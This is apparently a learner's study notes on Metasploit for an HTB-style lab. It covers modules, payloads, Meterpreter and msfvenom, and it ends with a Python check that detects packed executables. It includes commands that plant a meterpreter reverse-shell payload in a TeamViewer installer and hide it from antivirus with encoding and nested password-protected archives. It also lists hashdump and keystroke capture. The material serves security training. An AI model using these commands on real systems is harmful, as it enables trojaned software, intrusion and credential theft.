Metasploit Framework

A Ruby-based penetration testing platform that lets you write, test and execute exploits against a wide range of systems. By default all of its files reside in /usr/share/metasploit-framework

MSF Engagement Structure

An engagement is divided into five categories:

  • Enumeration

  • Preparation

  • Exploitation

  • Privilege Escalation

  • Post Exploitation

HTB

Starting Up

We can run msfconsole to start Metasploit

  • -q: quiet mode, starts msfconsole without the banner

Modules

Modules are split into categories. Exploit modules are proof-of-concept code that exploits a known vulnerability in an automated manner.

There are many types of modules, including:

  • Auxiliary - Scanning, fuzzing

  • Exploits - Exploit a vulnerability

  • Post - Gather information and pivot deeper

  • Encoders - Re-encode payloads so they reach their destination intact (for example by avoiding bad characters)

  • etc.

We can search for a module and then select it with:

search <name>

search <name> type:<exploit-type>


use <module-name>

use <module-number>


We can see more about the selected module with the info command

Once happy, we can run show options to see all required parameters and then set them with set <option> <value>

For example:

set RHOSTS 10.10.xx.x

setg RHOSTS 10.10.xx.x - sets the value globally, so it persists across modules until msfconsole is closed

Targets

A target is a unique identifier for the OS (or software) version the exploit module is aimed at, taken from the version of the OS selected for the module. The show targets command displays all vulnerable targets for the selected module.

show targets

Available targets:
  Id  Name
  --  ----
  0   Automatic
  1   IE 7 on Windows XP SP3
  2   IE 8 on Windows XP SP3
  3   IE 7 on Windows Vista
  4   IE 8 on Windows Vista
  5   IE 8 on Windows 7
  6   IE 9 on Windows 7

set target 2

Payloads

Payloads are sent with the exploit and typically return a reverse connection to the attacker to establish a foothold.

Singles

Contain the exploit and the shellcode in one unit. They are self-contained, which is designed to make them more stable.

Stagers

Small and reliable, stagers are used to perform one specific task: setting up the network connection between the attacker and the victim. The stager waits on the attacker machine, ready to connect to the victim host once the stage has finished running.

Metasploit will try the best payload first and fall back to another one if necessary.

Stages

Payload components that are downloaded by a stager.

They provide advanced features with no size limits, such as Meterpreter, and automatically use middle stagers.

Staged

An exploitation process that is modularized into different functions (stages). If the stages work correctly, it ultimately grants the attacker remote access to the machine.

Stage0

The initial shellcode is sent over the network to the target; if successful, it connects back to our machine. Common names include:

  • reverse_tcp

  • reverse_https

  • bind_tcp

Stage1

Meterpreter Payload

Resides entirely in the memory of the remote host, leaving no trace on disk, which makes it very hard to detect.

Once the payload is executed a new session is created, spawning a Meterpreter interface. This lets us load plugins and offers a host of options against the target:

show payloads

grep <payload-name> show payloads: gives more control over the search

set payload <payload>

Encoders

Encoders make payloads compatible with different processor architectures and can help avoid antivirus detection.

show encoders

msfvenom -a x86 --platform windows -p <PAYLOAD> LHOST=xxx LPORT=xxx -b "\x00" -f perl -e x86/shikata_ga_nai

We can use msf-virustotal with an API key to analyze our payloads.

msf-virustotal -k <API-key> -f exp.exe

Databases

The database stores all our results: entry points, issues, discovered credentials and so on. It lets us manage all the hosts we have analysed.

The databases can also both be exported and imported.

First, check that the PostgreSQL database service is set up:

  • sudo service postgresql status

Then start the service

  • sudo systemctl start postgresql

Now we can create a new DB

  • sudo msfdb init

Check to see the status of the current DB

  • sudo msfdb status

Finally, we can start msfconsole and connect to the DB

  • sudo msfdb run

Workspaces

Like folders in a project, workspaces let us sort the results of scans, hosts and other information such as extracted IPs, subnets, networks or domains.

  • workspace

  • -a: add

  • -d: delete

  • workspace -a Target_1

Importing scan results

  • db_import <scan.nmap>

If we run hosts we see a table with each host's IP address, OS and other details.

If we run services we see a table of all the services, by port and name.

Nmap can also be run directly inside msfconsole, and the results are saved to our database:

  • db_nmap -sV -sS <IP>

Data Backup

  • db_export -f xml backup.xml

Credentials

Shows all credentials gathered from the target. Credentials can also be added manually.

  • creds

  • creds -h

Loot

Shows all loot (hash dumps, passwords, shadow files)

  • loot

Plugins

Plugins give us more flexibility in msfconsole: they can be loaded to provide extra functionality during an assessment.

We can download and install new plugins, for example, the DarkOperator Plugin suite:

git clone https://github.com/darkoperator/Metasploit-Plugins
sudo cp ./Metasploit-Plugins/pentest.rb /usr/share/metasploit-framework/plugins/pentest.rb

A list of useful ones:

load nessus

load mimikatz

load railgun

load priv

Tools

Command line utilities that can be called from the msfconsole menu

Sessions

msfconsole can manage multiple modules at once, which means we can have many sessions open and switch between them as we wish.

  • sessions: Lists all active sessions

  • sessions -i <session-num>: Loads session by number

  • bg: Background the current session

Some modules require a session to be set as a parameter (the SESSION option)

Jobs

Jobs let us look at the tasks currently running in the background and terminate old ones to free up ports.

jobs

exploit -j: Runs exploit as background job

jobs -l: Lists running jobs

Meterpreter

A Meterpreter session gives us capabilities such as:

  • Looking at system processes

  • Network configurations

  • Taking screenshots

  • Capturing keystrokes

  • Taking over the victim's web camera

Helpful commands:

  • getsystem = Attempts to elevate our privileges on the system

  • hashdump = Dumps the contents of the SAM database

  • ? = Help command

  • upload / download = Uploads or downloads a file

It is stealthy to use: not only does it reside in memory and write nothing to disk, it now uses encryption (AES) to ensure the confidentiality of the data it sends.

We can search, use and configure our exploit and payload as shown in the above sections.

Be aware that, due to permissions, if we upload something as a payload we may not be able to remove it from the target, leaving evidence that the target was compromised!

Writing and Importing Modules

If we find we are missing a certain module, we can download it from Exploit-DB:

searchsploit <exploit-name>

searchsploit -t <exploit-name> --exclude="<.ext>"

FILENAME => x.rb

cp ~/Downloads/x.rb /usr/share/metasploit-framework/modules/exploits/unix/webapp/x.rb
msfconsole -m /usr/share/metasploit-framework/modules/

loadpath /usr/share/metasploit-framework/modules/

reload_all

Msfvenom

Msfvenom Payloads

We can use Ncat as our listener, or obtain a Meterpreter shell by catching the connection with Metasploit.

Once we've got a shell we can run

run post/multi/recon/local_exploit_suggester

This will give some suggestions on how further to exploit the machine.

We can also search for an exploit suggester outside of the session

search local exploit suggester

If the payload keeps failing, we can sometimes get more information by enabling verbose output:

set VERBOSE true

Firewall and IDS/IPS Evasion

Endpoint Protection

Refers to a localised device whose purpose is to protect a single host. Antivirus or anti-malware protection, a firewall and anti-DDoS usually come in one package, for example:

  • BitDefender

  • Malwarebytes

Perimeter Protection

A physical or virtual device at the network perimeter (edge). It controls access into the network from the outside (public to private).

Evasion Techniques

Most AVs rely on signature-based detection to find malicious code inside software. When unknown software is detected by the AV, it is quarantined.

Embedding

We can use msfvenom to embed a payload inside a legitimate .exe file; this hides the payload shellcode deep inside the software, lowering our detection chances.

Let's do this with TeamViewer_Setup.exe

msfvenom -p windows/x86/meterpreter_reverse_tcp LHOST=10.10.14.2 LPORT=8080 -k -x ~/Downloads/TeamViewer_Setup.exe -e x86/shikata_ga_nai -a x86 --platform windows -o ~/Desktop/TeamViewer_Setup.exe -i 5

Archives

Archiving a file, script, folder, executable, picture or any other content can help bypass AV scanning.

msfvenom -p windows/x86/meterpreter_reverse_tcp LHOST=10.10.14.2 LPORT=8080 -k -e x86/shikata_ga_nai -a x86 --platform windows -o ~/test.js -i 5

Archiving it twice leads to even lower detection rates from AVs.

wget https://www.rarlab.com/rar/rarlinux-x64-612.tar.gz
tar -xzvf rarlinux-x64-612.tar.gz && cd rar
rar a ~/test.rar -p ~/test.js

Remove .RAR

mv test.rar test

Archive payload again

rar a test2.rar -p test

Remove .RAR again

mv test2.rar test2

Packers

An executable compression process in which the payload is packed together with an .exe program and the decompression code in one file. When the packed file runs, the decompression code restores the backdoored executable to its initial state, allowing for an even higher chance of evading AVs.

  • UPX packer

  • MPRESS

  • MEW

  • ExeStealth
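As an added example from the defensive side (not from the original notes), a static triage check that walks the PE section table and flags the two things a packed executable usually gives away: packer-specific section names and sections whose raw data has near-maximal entropy. The UPX section names are certain; the MPRESS names and the 7.0-bit threshold are assumptions. The PE file is constructed inline so the check runs offline.

```python
import math, struct

# Section names left by common packers (UPX0/UPX1 certain; MPRESS names are an assumption).
PACKER_SECTION_NAMES = {b"UPX0", b"UPX1", b"UPX2", b".MPRESS1", b".MPRESS2"}

def shannon_entropy(data):
    """Bits per byte: compressed or encrypted data sits close to 8.0."""
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    return -sum(c / len(data) * math.log2(c / len(data)) for c in counts if c)

def pe_sections(pe):
    """Walk the section table; return (name, raw_size, entropy) per section."""
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0] if pe[:2] == b"MZ" else -1
    if e_lfanew < 0 or pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("not a PE file")
    nsections = struct.unpack_from("<H", pe, e_lfanew + 6)[0]
    opt_size = struct.unpack_from("<H", pe, e_lfanew + 20)[0]
    table = e_lfanew + 24 + opt_size  # section headers follow the optional header
    out = []
    for i in range(nsections):
        name, _vs, _va, raw_size, raw_ptr = struct.unpack_from("<8sIIII", pe, table + 40 * i)
        out.append((name.rstrip(b"\0"), raw_size, shannon_entropy(pe[raw_ptr:raw_ptr + raw_size])))
    return out

def packer_indicators(pe, entropy_threshold=7.0):
    """Static findings a triage script can raise before the file is ever run."""
    findings = []
    for name, raw_size, entropy in pe_sections(pe):
        if name in PACKER_SECTION_NAMES:
            findings.append(f"{name.decode()}: known packer section name")
        if raw_size and entropy >= entropy_threshold:
            findings.append(f"{name.decode()}: high entropy {entropy:.2f}")
    return findings

def build_sample_pe(sections):
    """Constructed minimal PE: DOS header, PE signature, COFF header (no optional header), section table, raw data."""
    dos = b"MZ" + bytes(58) + struct.pack("<I", 64)  # e_lfanew = 64
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, 0, 0x102)
    table, body, data_off = b"", b"", 88 + 40 * len(sections)
    for name, data in sections:
        table += struct.pack("<8sIIIIIIHHI", name, len(data), 0x1000, len(data),
                             data_off + len(body), 0, 0, 0, 0, 0x60000020)
        body += data
    return dos + b"PE\0\0" + coff + table + body

# Constructed sample with a UPX-style layout: an empty UPX0 and a high-entropy UPX1.
PACKED_SAMPLE = build_sample_pe([(b"UPX0", b""), (b"UPX1", bytes(range(256)) * 8), (b".rsrc", b"A" * 512)])
```

Real packed binaries also carry an optional header and an entry point inside the packer stub; the parser above handles the optional header via SizeOfOptionalHeader, so it works on real files as well as the constructed sample.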
